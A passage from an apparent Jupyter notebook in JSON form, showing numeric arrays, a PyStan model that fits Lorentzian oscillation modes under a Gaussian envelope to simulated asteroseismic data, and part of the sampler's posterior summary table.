20.90890891 20.93693694 20.96496496 20.99299299 21.02102102 21.04904905\n 21.07707708 21.10510511 21.13313313 21.16116116 21.18918919 21.21721722\n 21.24524525 21.27327327 21.3013013 21.32932933 21.35735736 21.38538539\n 21.41341341 21.44144144 21.46946947 21.4974975 21.52552553 21.55355355\n 21.58158158 21.60960961 21.63763764 21.66566567 21.69369369 21.72172172\n 21.74974975 21.77777778 21.80580581 21.83383383 21.86186186]\n [21.88988989 21.91791792 21.94594595 21.97397397 22.002002 22.03003003\n 22.05805806 22.08608609 22.11411411 22.14214214 22.17017017 22.1981982\n 22.22622623 22.25425425 22.28228228 22.31031031 22.33833834 22.36636637\n 22.39439439 22.42242242 22.45045045 22.47847848 22.50650651 22.53453453\n 22.56256256 22.59059059 22.61861862 22.64664665 22.67467467 22.7027027\n 22.73073073 22.75875876 22.78678679 22.81481481 22.84284284 22.87087087\n 22.8988989 
22.92692693 22.95495495 22.98298298 23.01101101 23.03903904\n 23.06706707 23.0950951 23.12312312 23.15115115 23.17917918 23.20720721\n 23.23523524 23.26326326 23.29129129 23.31931932 23.34734735 23.37537538\n 23.4034034 23.43143143 23.45945946 23.48748749 23.51551552 23.54354354\n 23.57157157 23.5995996 23.62762763 23.65565566 23.68368368 23.71171171\n 23.73973974 23.76776777 23.7957958 23.82382382 23.85185185]\n [23.87987988 23.90790791 23.93593594 23.96396396 23.99199199 24.02002002\n 24.04804805 24.07607608 24.1041041 24.13213213 24.16016016 24.18818819\n 24.21621622 24.24424424 24.27227227 24.3003003 24.32832833 24.35635636\n 24.38438438 24.41241241 24.44044044 24.46846847 24.4964965 24.52452452\n 24.55255255 24.58058058 24.60860861 24.63663664 24.66466466 24.69269269\n 24.72072072 24.74874875 24.77677678 24.8048048 24.83283283 24.86086086\n 24.88888889 24.91691692 24.94494494 24.97297297 25.001001 25.02902903\n 25.05705706 25.08508509 25.11311311 25.14114114 25.16916917 25.1971972\n 25.22522523 25.25325325 25.28128128 25.30930931 25.33733734 25.36536537\n 25.39339339 25.42142142 25.44944945 25.47747748 25.50550551 25.53353353\n 25.56156156 25.58958959 25.61761762 25.64564565 25.67367367 25.7017017\n 25.72972973 25.75775776 25.78578579 25.81381381 25.84184184]\n [25.86986987 25.8978979 25.92592593 25.95395395 25.98198198 26.01001001\n 26.03803804 26.06606607 26.09409409 26.12212212 26.15015015 26.17817818\n 26.20620621 26.23423423 26.26226226 26.29029029 26.31831832 26.34634635\n 26.37437437 26.4024024 26.43043043 26.45845846 26.48648649 26.51451451\n 26.54254254 26.57057057 26.5985986 26.62662663 26.65465465 26.68268268\n 26.71071071 26.73873874 26.76676677 26.79479479 26.82282282 26.85085085\n 26.87887888 26.90690691 26.93493493 26.96296296 26.99099099 27.01901902\n 27.04704705 27.07507508 27.1031031 27.13113113 27.15915916 27.18718719\n 27.21521522 27.24324324 27.27127127 27.2992993 27.32732733 27.35535536\n 27.38338338 27.41141141 27.43943944 27.46746747 
27.4954955 27.52352352\n 27.55155155 27.57957958 27.60760761 27.63563564 27.66366366 27.69169169\n 27.71971972 27.74774775 27.77577578 27.8038038 27.83183183]]\n[[ 1.91675756e+00 -1.05612919e+00 2.74001600e+00 -5.00802069e-02\n 2.81231605e+00 2.84592504e+00 3.40480508e+00 1.54987543e+00\n 7.79606284e-01 7.35137346e-01 2.10674410e+00 8.29729277e-01\n 7.84910755e-01 1.33678103e+00 -1.03371550e+00 -1.33023405e+00\n 1.45058122e+00 9.42209005e-01 1.55694463e+00 1.87939243e+00\n 1.98146709e-01 5.60858259e-01 1.84028794e+00 3.02941180e-02\n 1.65857602e+00 6.24590374e-01 2.98333518e-01 3.36039873e-01\n 1.04253504e+00 5.76140631e-01 2.09053984e-01 2.40542784e+00\n 1.89113834e+00 6.80793799e-01 1.86818656e+00 2.50719548e+00\n 1.70164099e+00 9.83210363e-01 1.19658698e-01 1.33467684e+00\n 5.13950226e-01 1.48559131e+00 6.65594600e-01 9.31675890e-01\n 2.42335859e+00 1.84617436e+00 1.91451657e+00 1.53080298e+00\n 1.42830977e+00 2.82355118e+00 1.82205303e+00 1.29015631e+00\n 1.34916552e+00 1.92091164e+00 1.18586820e+00 6.08176554e-01\n 2.85537129e+00 8.18157203e-01 1.69108022e+00 4.03508449e-02\n 1.31571904e+00 1.68469680e+00 1.19393305e+00 -3.60639195e-01\n 1.22093979e+00 2.02459758e+00 1.65722468e+00 -9.02430279e-01\n 1.53527605e+00 2.24133579e-02 9.53439516e-01]\n [ 2.11435545e+00 1.48509675e+00 8.65489514e-01 4.41312938e-02\n 2.08598021e+00 1.63281198e+00 -5.26530443e-01 1.51752908e+00\n -5.72716027e-01 -1.18688803e+00 1.66342295e+00 1.43578191e+00\n 7.75656107e-01 -8.25017305e-02 4.55392900e-01 1.04454376e+00\n 1.27104653e+00 2.83983802e+00 2.44113325e+00 6.19683440e-01\n 1.17823201e+00 1.59241416e+00 2.59785014e+00 2.60187085e-01\n 1.21972681e+00 2.33167672e+00 1.31923559e+00 -1.00518589e+00\n 4.10327380e-01 3.26168068e+00 -1.05137641e-01 1.81976841e+00\n 1.48388169e+00 1.85285337e+00 3.08747012e+00 3.61845021e+00\n 3.85173538e+00 5.46330778e+00 2.87134170e+00 2.62018094e+00\n 1.99265220e+00 -3.61135351e-01 3.20124938e+00 -1.25272365e+00\n 9.72339410e-01 1.21898458e-01 
2.30778590e+00 1.22440946e+00\n 1.76180137e+00 8.19096751e-01 -8.53433163e-01 1.87201240e+00\n -2.62624730e-01 -5.75176638e-01 9.29048920e-01 2.81112688e+00\n 9.17750410e-01 7.45479233e-01 5.78462808e-01 1.42765231e+00\n -3.20019884e-01 1.28757200e+00 1.50542461e-01 3.41692411e-01\n 1.30584411e+00 1.96495189e+00 1.41840792e+00 1.55078672e-01\n 1.08006734e+00 -2.00464414e-01 1.90291823e-01]\n [ 1.98997599e+00 8.65808051e-01 -4.37118606e-01 2.12951408e+00\n 1.52369397e+00 9.51762435e-01 5.23189030e-01 1.28462323e+00\n 1.36872548e+00 9.18051074e-01 1.52824436e+00 1.35244565e+00\n 2.57602079e+00 1.94872570e-01 2.64203314e+00 -9.25741451e-01\n 2.56236646e+00 3.05896866e-01 1.28809757e+00 1.26268488e+00\n 2.85152418e+00 1.65386790e+00 1.03701406e+00 1.10688367e+00\n 1.62456989e+00 1.36234609e+00 1.73125902e+00 1.57552934e+00\n 5.72791496e-01 -2.97752879e-01 2.12765303e+00 1.06660312e+00\n 2.51640055e+00 2.90522309e+00 5.82555096e+00 4.50966336e+00\n 3.38472081e+00 2.10489040e+00 2.34150165e+00 1.12284251e+00\n 1.98201388e+00 2.09218630e+00 -5.41168134e-01 -9.48015543e-01\n 3.78537719e-01 8.94248938e-01 1.57193568e+00 2.40199150e+00\n 1.43915982e+00 1.67992585e+00 1.55161317e+00 2.49970264e+00\n 6.47985617e-01 2.05961626e+00 3.22359368e+00 1.83912590e+00\n 2.06020591e+00 -1.00450961e+00 1.02081495e+00 4.95359006e-01\n -3.11187175e-01 1.26791336e+00 8.10655933e-01 5.59604359e-01\n -2.79270819e-01 1.06644478e+00 1.43884569e+00 1.17662750e+00\n 2.57926170e+00 1.03249447e+00 8.92900388e-01]\n [ 2.96427473e-01 3.45721782e-01 -6.59990517e-01 6.16020463e-01\n -1.23051855e-02 8.17092584e-01 -7.93939931e-01 -9.09236037e-02\n 1.43743845e+00 9.96601898e-01 1.51197557e+00 -2.08145603e-01\n -7.74818284e-01 1.77929880e-01 1.04650399e+00 1.51932976e+00\n 1.89636899e+00 2.80952668e+00 2.24404959e+00 2.91484979e-01\n 7.33276802e-01 5.06146207e-01 1.66836568e+00 1.78353328e+00\n 2.49290584e-01 2.42185659e+00 1.41386630e+00 8.59096879e-01\n 5.02732870e-01 2.41543988e+00 -6.70082822e-01 
9.39795903e-01\n 7.97515691e-01 3.15919692e+00 4.55426411e+00 6.82809417e+00\n 9.57560018e+00 8.64999231e+00 7.05306641e+00 1.67940325e+00\n 3.95864811e+00 1.37935502e+00 7.19151059e-01 1.28712030e-01\n 6.61874489e-01 1.40704174e+00 2.26304671e+00 -3.17661931e-01\n 3.56896921e-01 1.41583664e+00 1.49231420e+00 6.28305688e-01\n 6.01809992e-01 2.74302557e+00 5.91055917e-01 1.99763753e+00\n 2.66191336e+00 3.59116525e+00 2.36139704e+00 2.57433568e+00\n 3.58561973e+00 1.30713956e+00 1.10982321e-01 1.92736218e+00\n 1.17177910e+00 -6.67935968e-02 1.31002050e+00 7.92280766e-01\n 1.15491995e+00 2.06697189e+00 2.27523086e+00]\n [ 2.12906105e+00 2.51803237e+00 7.90905094e-01 4.77280234e-01\n 1.22338308e+00 1.39053868e+00 -1.26597262e-01 1.23737023e+00\n 2.39667984e-01 3.92284869e-01 1.53579918e+00 1.49195359e+00\n 1.35997462e+00 8.19790724e-01 6.64067077e-01 2.57078757e+00\n 7.43474781e-01 9.63438702e-01 -6.37217094e-02 -8.12459739e-01\n 3.59870078e+00 7.41500005e-01 9.02682901e-01 6.09073407e-01\n 1.75169836e+00 7.29265467e-01 2.71400954e+00 7.51467784e-02\n 6.64758212e-01 6.91476759e-01 1.04939414e+00 1.86608771e+00\n 6.60001048e-01 4.53447188e+00 3.74530068e+00 7.02055911e+00\n 1.16468274e+01 1.43587907e+01 1.74638750e+01 1.30655366e+01\n 5.99645319e+00 5.86562362e+00 1.33042652e+00 2.43032763e+00\n 5.03371450e-01 1.15901037e+00 1.04058956e+00 1.45304772e+00\n 1.02457650e+00 2.34236769e+00 2.21662342e+00 1.02589732e+00\n 1.93097093e+00 2.00857601e+00 2.42740177e+00 -3.04044359e-01\n 6.57431415e-01 5.41104702e-01 -3.59108311e-01 1.59386874e+00\n 6.47247660e-01 3.38939099e-01 1.76170842e+00 2.86369133e-02\n 1.18616304e+00 1.80801739e+00 2.23731018e-01 1.44312668e+00\n 2.14281319e+00 5.74353414e-01 6.60002564e-01]\n [ 1.53884254e+00 1.96372532e+00 -1.25214421e-01 1.00908727e+00\n 6.84738525e-01 1.91414636e+00 1.44746061e-01 2.01652774e+00\n 1.04892184e+00 2.56468508e+00 1.31971614e+00 1.69479068e+00\n 9.85488460e-01 7.07432393e-01 1.22421567e+00 2.45224258e-01\n 1.54669925e+00 
7.39533193e-01 1.98517881e+00 -4.56930212e-01\n 1.04960336e+00 -5.23514568e-01 2.02056562e+00 2.15696541e+00\n 2.33637111e+00 1.30931655e+00 1.20701869e+00 3.28367914e+00\n -3.17106913e-01 -1.27382566e-02 1.64668737e+00 2.56323154e+00\n 3.57548946e+00 2.90792639e+00 2.89663279e+00 4.22360302e+00\n 5.75431480e+00 1.12150742e+01 1.41977542e+01 2.13849415e+01\n 1.82791280e+01 1.10094869e+01 6.82856142e+00 4.90717633e+00\n 2.27296099e+00 1.78841974e+00 2.87628684e+00 5.32980295e-01\n 2.47027679e+00 3.28244775e+00 2.46829416e+00 1.81270188e+00\n 7.94521733e-03 1.81572686e+00 -1.96326329e-01 2.03357146e+00\n -4.01627439e-01 3.32535303e+00 2.76857949e+00 -1.05261221e-01\n -7.05522892e-03 2.75050591e+00 1.02291949e+00 -6.01280291e-02\n 1.82551068e-01 9.27540618e-01 1.41947254e+00 1.60313410e+00\n 1.98153804e+00 -3.71475692e-01 1.55884639e+00]\n [ 1.36549514e+00 2.64663302e+00 5.70668913e-01 1.25875001e+00\n 3.44389776e+00 8.95364397e-01 2.21000236e+00 7.57289303e-01\n 2.88583098e+00 -4.84688274e-01 -5.57627454e-01 3.32238918e+00\n -5.42443432e-01 1.04954803e-01 1.56653357e+00 -4.66110623e-02\n 7.13488893e-01 -3.89470270e-01 1.17040289e+00 3.88121774e+00\n 1.22460971e+00 3.69146502e-01 -1.86977496e-01 1.22297969e+00\n 3.53371970e+00 -6.89862784e-01 1.77867454e+00 8.21563409e-01\n 1.33942156e+00 3.47185556e+00 1.10842876e+00 2.37814229e+00\n 2.91081517e+00 5.09371807e+00 6.90339548e+00 9.19910840e+00\n 1.58282693e+01 2.43228658e+01 2.22476922e+01 1.75175018e+01\n 7.36277555e+00 5.96345201e+00 4.64262234e+00 4.71585788e+00\n 2.29949145e+00 4.03784885e-01 2.34395623e+00 4.94218839e-01\n 2.19394324e+00 4.98850079e+00 1.32037231e+00 1.75755600e+00\n 3.50496777e+00 -2.85199122e-01 2.22827655e+00 -1.81879062e+00\n 1.09146188e+00 1.09958055e-01 8.42773585e-01 1.11856357e+00\n 4.70426920e-01 6.65256236e-01 7.01646130e-01 2.86124929e+00\n 8.31334140e-01 9.01514742e-01 1.66521330e-01 7.09739649e-01\n -1.64030611e+00 1.51987578e+00 1.38695964e-01]\n [-1.03520132e+00 1.84598545e+00 
2.10479085e-01 2.10441366e+00\n 9.32345131e-01 2.67686202e+00 2.17242216e-01 1.24288450e+00\n 2.37615487e+00 1.15617576e+00 1.95237926e+00 1.28203426e+00\n 2.18729581e+00 1.21577037e+00 2.18785397e+00 1.57532306e+00\n 2.74265024e+00 8.47171296e-01 4.95575101e-01 1.94127375e+00\n 1.95519584e+00 2.01524230e+00 2.41816791e+00 2.75765680e-01\n 2.31975802e+00 1.69678821e+00 2.57523811e-03 3.04883555e+00\n 2.18431179e-01 2.30324043e+00 2.42405133e+00 3.55531087e+00\n 1.88008975e+00 2.59486455e+00 3.08491337e+00 5.14480584e+00\n 6.71203225e+00 1.45730660e+01 2.24198767e+01 2.39709788e+01\n 1.88966850e+01 1.12369913e+01 5.20375737e+00 5.23948444e+00\n 2.80516560e+00 2.66170748e+00 1.71635182e+00 1.35566514e+00\n 2.70684164e+00 2.36118093e+00 1.92323083e+00 1.77023482e+00\n -3.36981410e-01 2.27388935e+00 7.71603723e-01 3.57767372e-01\n 2.02151503e+00 3.58805455e-01 4.15950762e-01 3.19185356e-01\n 2.28313382e+00 1.32719582e+00 2.54001760e+00 -1.00767747e+00\n 1.21786166e+00 1.36140951e+00 7.40043996e-01 1.82140196e+00\n 5.37526840e-01 4.39184691e-01 7.95245618e-01]\n [ 3.21433946e+00 1.42649766e+00 1.35623521e+00 4.86691947e-01\n 1.27350915e+00 5.08093025e-01 5.74788535e-01 2.96994306e+00\n 4.72150210e-01 -7.29269783e-01 2.96745397e+00 1.24696043e-01\n -2.05693531e-02 1.90615282e+00 -2.86476268e-01 1.39708562e+00\n 2.56669915e+00 2.10242242e+00 9.07870248e-01 1.21685142e+00\n 9.97067521e-01 2.15598865e+00 2.61124578e+00 1.28744963e+00\n 4.78062050e-01 2.26188738e+00 2.15595852e+00 3.25065256e+00\n 1.81812475e+00 3.58659283e-01 -2.41356104e-01 3.87397295e+00\n 3.93348136e+00 3.84482282e+00 6.69933954e+00 9.82382170e+00\n 1.67641931e+01 2.13692453e+01 1.61882800e+01 9.51787808e+00\n 6.62127046e+00 4.49586775e+00 3.20705143e+00 1.13737899e+00\n 1.56295540e+00 1.58373110e+00 1.81351399e+00 1.96033448e+00\n 2.38744143e+00 -5.24688128e-01 2.07297252e-01 9.93264936e-01\n 2.39604449e+00 1.20128288e+00 1.18755987e+00 1.65301034e+00\n 1.18145165e+00 3.07992412e-03 7.79802951e-01 
2.28793115e+00\n 1.15317153e+00 1.99952255e+00 1.11804771e+00 -3.61660859e-01\n 2.55758899e+00 -4.64194119e-04 1.24146455e+00 1.50028365e+00\n 8.44875297e-01 -2.87063108e-01 1.62069068e+00]\n [ 3.06308265e+00 1.42184735e+00 1.45186313e-01 -2.62565616e-01\n 7.26619674e-01 1.82911001e+00 -1.27498109e+00 8.69033571e-01\n 1.03040403e+00 2.39099229e+00 7.92789379e-01 7.31565126e-01\n 1.19599048e+00 6.42550158e-01 1.53936771e+00 2.31598802e+00\n 2.24055985e+00 1.18140441e+00 1.49008858e+00 8.67208995e-01\n -7.04493390e-01 5.98109360e-01 7.08354573e-01 1.86670970e+00\n 2.47416848e+00 -3.59312697e-01 1.71830884e+00 2.87087487e+00\n 2.23182128e+00 1.89799686e+00 2.04826044e+00 2.73763971e+00\n 2.44342818e+00 2.95887171e+00 2.48625817e+00 3.92812780e+00\n 4.95751257e+00 9.24456635e+00 1.55575864e+01 1.57038087e+01\n 1.09926159e+01 7.01142765e+00 3.52060000e+00 1.90856248e+00\n 3.43148371e+00 1.97052563e+00 -6.36221672e-04 2.53248912e+00\n 2.57224908e+00 9.59462875e-01 1.44833092e+00 9.35300716e-01\n 2.59020849e-01 4.68760453e-01 -1.07025500e+00 6.21691646e-01\n 4.03722336e-01 6.00565177e-01 2.87782293e+00 1.33108039e+00\n 5.40761730e-01 1.21929031e+00 -2.13048997e+00 6.75301983e-01\n 4.65823324e-01 -3.58420222e-01 -3.00173357e-02 3.19250218e+00\n 1.23198733e+00 -1.53732446e+00 6.14548753e-01]\n [ 8.70278370e-02 1.58278618e+00 5.07776396e-01 9.08459051e-02\n 4.64367021e+00 2.06858366e+00 2.25249701e+00 5.47224412e-01\n 6.78859552e-01 1.06434665e+00 2.92826995e+00 1.90263776e+00\n 6.81595387e-01 3.74587908e-01 4.65940803e-01 3.62689773e-02\n 5.72309782e-01 1.95878152e+00 1.22935635e+00 1.58387750e+00\n 3.21103841e-01 1.46297614e+00 1.08190619e+00 2.94072387e-01\n 3.23394830e+00 1.61583258e+00 5.33589151e-01 4.58199055e+00\n 6.06631658e-01 -4.24491816e-01 1.77006615e-01 1.95838707e+00\n 1.51472733e+00 2.46019735e+00 2.67462460e+00 2.93116606e+00\n 3.85064593e+00 4.35172632e+00 9.49291956e+00 1.14851154e+01\n 7.60647094e+00 4.92598831e+00 4.07163132e+00 4.15367668e+00\n 
1.60245182e+00 3.04457623e+00 8.35587604e-01 -4.15794100e-01\n 2.80016349e+00 3.34931461e-01 3.26823760e+00 1.06901164e+00\n 1.91124149e+00 2.17539413e+00 2.13205814e+00 2.35692346e+00\n 2.31203379e+00 2.30858086e+00 2.36365774e+00 1.90154992e+00\n 6.07382665e-01 1.70271220e+00 1.88157957e+00 3.15410157e+00\n 9.45246826e-01 2.18498617e+00 7.36572712e-01 1.47861580e+00\n 2.16104937e+00 -2.86774225e-01 1.24894412e+00]\n [ 2.10186690e+00 7.56080073e-01 1.71843872e+00 1.36408639e+00\n 1.95767647e+00 6.67871200e-02 3.30280974e-02 2.11917311e+00\n 1.66526601e+00 6.50752320e-01 1.16689539e+00 4.89854145e-01\n 2.16452196e+00 -2.87435491e-01 1.08225345e+00 7.61448963e-01\n 9.44075747e-01 2.35507330e+00 1.31966189e+00 2.12474265e+00\n 2.22884075e+00 1.21885955e+00 7.56736532e-01 -1.11366709e+00\n 2.75668231e-01 7.60446133e-01 1.43860350e-01 2.07850474e+00\n 1.23652853e+00 1.36239517e+00 1.34984048e+00 2.01656678e+00\n -3.49438085e-01 -1.45040578e+00 -1.21105090e-01 2.05381095e+00\n 1.48947535e+00 3.99297316e+00 5.91298497e+00 5.61273707e+00\n 5.13274392e+00 4.00438190e+00 1.07929137e+00 2.67589914e+00\n 1.78037481e+00 1.02772332e-02 1.75362158e+00 7.08765592e-01\n 2.01589152e+00 5.92972401e-01 1.24998779e+00 -1.52740224e+00\n 1.95195961e+00 1.80882201e+00 1.41856842e+00 1.16957196e+00\n 1.06925902e+00 1.58875558e+00 2.06501592e+00 2.32569709e+00\n 4.79097420e-01 -1.24263207e-01 2.15186971e+00 9.28637223e-01\n 1.36997579e+00 4.48371614e-01 8.00876588e-01 1.01921126e+00\n 2.55647320e+00 -4.55146490e-01 1.46440487e+00]\n [ 1.77368615e+00 -1.35811674e+00 7.61036893e-01 4.04603835e-01\n 4.19556019e-01 3.30879665e-01 1.98660689e+00 1.01834586e+00\n 2.01308930e+00 1.85152225e+00 7.83510363e-01 1.05480083e+00\n 3.71915790e-02 1.55312867e+00 1.23506052e+00 5.90532844e-01\n 6.56451022e-01 3.38133934e+00 2.49724687e+00 6.24603192e-02\n 2.44923091e+00 1.57573771e+00 1.20662120e-01 2.14733540e+00\n 1.18813900e+00 2.14501521e+00 -5.07455602e-01 3.67728319e-01\n 1.77534701e+00 
-7.04785500e-01 1.43738460e+00 1.26008192e+00\n 2.21327907e+00 7.31552728e-01 1.74414025e+00 8.33083216e-01\n 1.08291903e+00 3.14626084e-01 2.12643427e+00 3.43204568e+00\n 1.38437701e+00 5.82725385e-01 2.59560115e+00 1.27815522e+00\n 2.22627208e+00 -1.62903028e-01 1.23263127e+00 2.23253538e+00\n 5.57201442e-01 1.52544709e+00 7.91176643e-01 5.50822338e-01\n 4.16718300e-01 1.61117111e+00 -3.11310010e-01 2.55906694e+00\n 1.46518464e+00 1.12440708e+00 -2.57791023e-01 1.47689227e+00\n 1.49434921e-01 1.63565440e+00 1.82299471e+00 1.51541379e+00\n 1.96728743e+00 7.87902263e-01 -3.64527094e-01 9.74052971e-01\n 2.37086926e+00 1.51573270e+00 1.03086052e+00]\n [ 1.77352937e+00 1.30930738e+00 1.27249965e+00 1.60823082e+00\n 1.43883683e+00 -6.13101327e-01 1.67209884e+00 -8.78477953e-01\n 1.65527508e+00 1.19489175e+00 7.07495435e-01 1.66198445e-01\n 1.42468249e+00 2.73166073e+00 -1.13827046e+00 8.85951598e-01\n -7.13540784e-01 4.94799345e-01 8.03724417e-01 6.43777752e-01\n 1.84061071e+00 1.54085474e+00 4.40269845e-01 1.60944414e+00\n -9.68414080e-01 2.33662793e+00 -2.34572020e-01 1.45607408e+00\n 1.61319601e+00 2.08671847e-01 1.29983130e+00 6.67940808e-01\n 1.53463042e+00 3.01672734e-01 2.02081476e+00 3.75174307e-02\n 2.66459973e+00 2.42206085e+00 8.79951639e-01 2.73533549e+00\n 2.56090386e+00 8.79910622e-01 2.10286650e+00 -1.38734620e-02\n 1.31683039e+00 1.12961048e+00 2.60118729e+00 5.44623138e-01\n 4.11800287e-01 1.41278549e+00 1.65520817e+00 5.04467542e-01\n 1.50943201e+00 1.63647409e+00 -3.06238887e-01 2.43501288e+00\n 3.66189306e-01 -2.16349666e-01 9.25628756e-01 1.86677658e+00\n 1.08934892e+00 2.18286984e+00 2.17001355e-01 2.68832100e-01\n 2.15408079e+00 -2.51391997e+00 -9.13802792e-01 -2.76919192e-01\n 2.20808628e+00 1.15481029e+00 1.47654040e+00]]\n" ] ], [ [ "And now we build the example Pystan model:", "_____no_output_____" ] ], [ [ "code = '''\nfunctions {\n real lor(real freq, real f0, real w, real h){\n return h / (1 + 4 * ((freq - f0)/w)^2);\n }\n real 
gaussian(real f, real numax, real width, real height){\n return height * exp(-0.5 * (f - numax)^2 / width^2);\n }\n}\ndata {\n int N; // Data points per order\n int M; // Number of orders\n real freq[M, N];\n real snr[M, N];\n real dnu_est;\n real numax_est;\n}\nparameters {\n real<lower = 0> dnu;\n real<lower = 0> numax;\n real<lower = 0> envwidth;\n real<lower = 0> envheight;\n real modewidth;\n real delta[M];\n real<lower = 0> scale;\n}\ntransformed parameters {\n real mode_freqs[M];\n real mode_heights[M];\n for (i in 1:M){\n mode_freqs[i] = (i-0.5) * dnu + delta[i] * scale;\n mode_heights[i] = gaussian(mode_freqs[i], numax, envwidth, envheight);\n }\n}\nmodel {\n real beta[N];\n for (i in 1:M){\n for (j in 1:N){\n beta[j] = (1.0 + lor(freq[i, j], mode_freqs[i], modewidth, mode_heights[i]));\n }\n snr[i, :] ~ normal(beta, 1.0);\n }\n dnu ~ normal(dnu_est, dnu_est * 0.01);\n dnu ~ uniform(dnu_est * 0.9, dnu_est * 1.1);\n numax ~ normal(numax_est, numax_est * 0.01);\n numax ~ uniform(numax_est * 0.9, numax_est * 1.1);\n envwidth ~ normal(5.0, 1.0);\n envheight ~ normal(25.0, 3.0);\n modewidth ~ lognormal(log(0.1), 0.05);\n modewidth ~ uniform(0, 0.5);\n delta ~ normal(0, 1); \n scale ~ normal(0, 0.01);\n}\n'''\nimport pystan\nsm = pystan.StanModel(model_code=code)", "INFO:pystan:COMPILING THE C++ CODE FOR MODEL anon_model_ae1e6452f5130395d3f50a4387192288 NOW.\n" ] ], [ [ "The code takes a while to converge. 
We run for 20000 iterations and check the results.", "_____no_output_____" ] ], [ [ "stan_data = {'N': len(ladder_f[0,:]), 'M': len(ladder_p[:,0]), \n 'freq': ladder_f, 'snr': ladder_p,\n 'dnu_est': dnu, 'numax_est': numax}\nnchains = 4\nstart = {'dnu': dnu, 'numax': numax}\nfitsm = sm.sampling(data=stan_data, iter=20000, chains=nchains, init=[start for n in range(nchains)])", "/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/pystan/misc.py:399: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n elif np.issubdtype(np.asarray(v).dtype, float):\n" ], [ "fitsm.plot()\nplt.show()", "_____no_output_____" ], [ "print(fitsm)", "Inference for Stan model: anon_model_ae1e6452f5130395d3f50a4387192288.\n4 chains, each with iter=20000; warmup=10000; thin=1; \npost-warmup draws per chain=10000, total post-warmup draws=40000.\n\n mean se_mean sd 2.5% 25% 50% 75% 97.5% n_eff Rhat\ndnu 2.0 9.9e-6 9.1e-4 2.0 2.0 2.0 2.0 2.0 8355 nan\nnumax 13.97 3.5e-4 0.07 13.84 13.92 13.97 14.02 14.11 40000 1.0\nenvwidth 5.07 4.1e-4 0.08 4.91 5.01 5.07 5.13 5.23 40000 1.0\nenvheight 24.97 2.5e-3 0.43 24.13 24.68 24.97 25.26 25.81 29869 1.0\nmodewidth 0.1 1.0e-5 2.0e-3 0.1 0.1 0.1 0.1 0.1 37423 1.0\ndelta[0] -0.36 4.3e-3 0.85 -2.0 -0.92 -0.37 0.19 1.37 40000 1.0\ndelta[1] 0.43 2.8e-3 0.57 -0.73 0.07 0.45 0.81 1.51 40000 1.0\ndelta[2] -2.0 3.1e-3 0.44 -2.93 -2.29 -1.99 -1.7 -1.18 21163 1.0\ndelta[3] -0.31 1.9e-3 0.24 -0.82 -0.47 -0.31 -0.15 0.15 17386 1.0\ndelta[4] 0.92 2.5e-3 0.25 0.45 0.75 0.91 1.09 1.44 10160 1.0\ndelta[5] 2.38 4.3e-3 0.43 1.59 2.08 2.37 2.66 3.28 10148 1.0\ndelta[6] -0.12 2.8e-3 0.26 -0.64 -0.3 -0.12 0.06 0.39 8684 1.0\ndelta[7] 1.1 3.7e-3 0.34 0.44 0.86 1.09 1.32 1.78 8468 1.0\ndelta[8] -1.51 4.2e-3 0.42 -2.37 -1.79 -1.5 -1.23 -0.71 9957 1.0\ndelta[9] 0.13 4.1e-3 0.38 -0.62 -0.13 0.13 0.39 0.89 
8602 1.0\ndelta[10] 0.09 4.5e-3 0.43 -0.76 -0.2 0.09 0.38 0.94 9264 1.0\ndelta[11] -0.23 4.8e-3 0.53 -1.28 -0.59 -0.23 0.13 0.82 12459 1.0\ndelta[12] -0.23 4.7e-3 0.74 -1.6 -0.72 -0.26 0.22 1.38 24967 1.0\ndelta[13] -0.25 4.4e-3 0.89 -2.02 -0.83 -0.26 0.33 1.52 40000 1.0\nscale 0.02 3.4e-5 3.8e-3 0.02 0.02 0.02 0.03 0.03 12140 1.0\nmode_freqs[0] 0.99 9.9e-5 0.02 0.95 0.98 0.99 1.0 1.03 40000 1.0\nmode_freqs[1] 3.01 6.4e-5 0.01 2.98 3.0 3.01 3.02 3.03 40000 1.0\nmode_freqs[2] 4.95 4.2e-5 8.5e-3 4.94 4.95 4.95 4.96 4.97 40000 1.0\nmode_freqs[3] 6.99 2.2e-5 4.5e-3 6.98 6.99 6.99 6.99 7.0 40000 1.0\nmode_freqs[4] 9.02 1.4e-5 2.7e-3 9.01 9.01 9.02 9.02 9.02 40000 1.0\nmode_freqs[5] 11.05 1.0e-5 2.0e-3 11.04 11.05 11.05 11.05 11.05 40000 1.0\nmode_freqs[6] 12.99 8.7e-6 1.7e-3 12.99 12.99 12.99 12.99 12.99 40000 1.0\nmode_freqs[7] 15.02 8.8e-6 1.8e-3 15.01 15.02 15.02 15.02 15.02 40000 1.0\nmode_freqs[8] 16.96 1.0e-5 2.0e-3 16.95 16.95 16.96 16.96 16.96 40000 1.0\nmode_freqs[9] 18.99 1.3e-5 2.7e-3 18.99 18.99 18.99 18.99 19.0 40000 1.0\nmode_freqs[10] 20.99 2.0e-5 4.0e-3 20.98 20.99 20.99 20.99 21.0 40000 1.0\nmode_freqs[11] 22.98 4.1e-5 8.3e-3 22.97 22.98 22.98 22.99 23.0 40000 1.0\nmode_freqs[12] 24.98 8.4e-5 0.02 24.95 24.97 24.98 24.99 25.02 40000 1.0\nmode_freqs[13] 26.98 1.3e-4 0.02 26.93 26.96 26.98 26.99 27.02 28813 1.0\nmode_heights[0] 0.94 5.0e-4 0.1 0.76 0.88 0.94 1.01 1.15 40000 1.0\nmode_heights[1] 2.41 9.2e-4 0.18 2.06 2.29 2.41 2.53 2.78 40000 1.0\nmode_heights[2] 5.13 1.3e-3 0.27 4.61 4.95 5.13 5.31 5.66 40000 1.0\nmode_heights[3] 9.67 1.6e-3 0.33 9.03 9.45 9.67 9.89 10.31 40000 1.0\nmode_heights[4] 15.48 1.7e-3 0.34 14.81 15.25 15.48 15.71 16.14 40000 1.0\nmode_heights[5] 21.14 1.9e-3 0.37 20.41 20.89 21.13 21.38 21.86 36303 1.0\nmode_heights[6] 24.5 2.4e-3 0.42 23.68 24.22 24.5 24.78 25.32 30474 1.0\nmode_heights[7] 24.44 2.4e-3 0.42 23.63 24.16 24.44 24.72 25.26 30378 1.0\nmode_heights[8] 20.99 1.9e-3 0.36 20.29 20.75 20.99 21.24 21.71 35672 
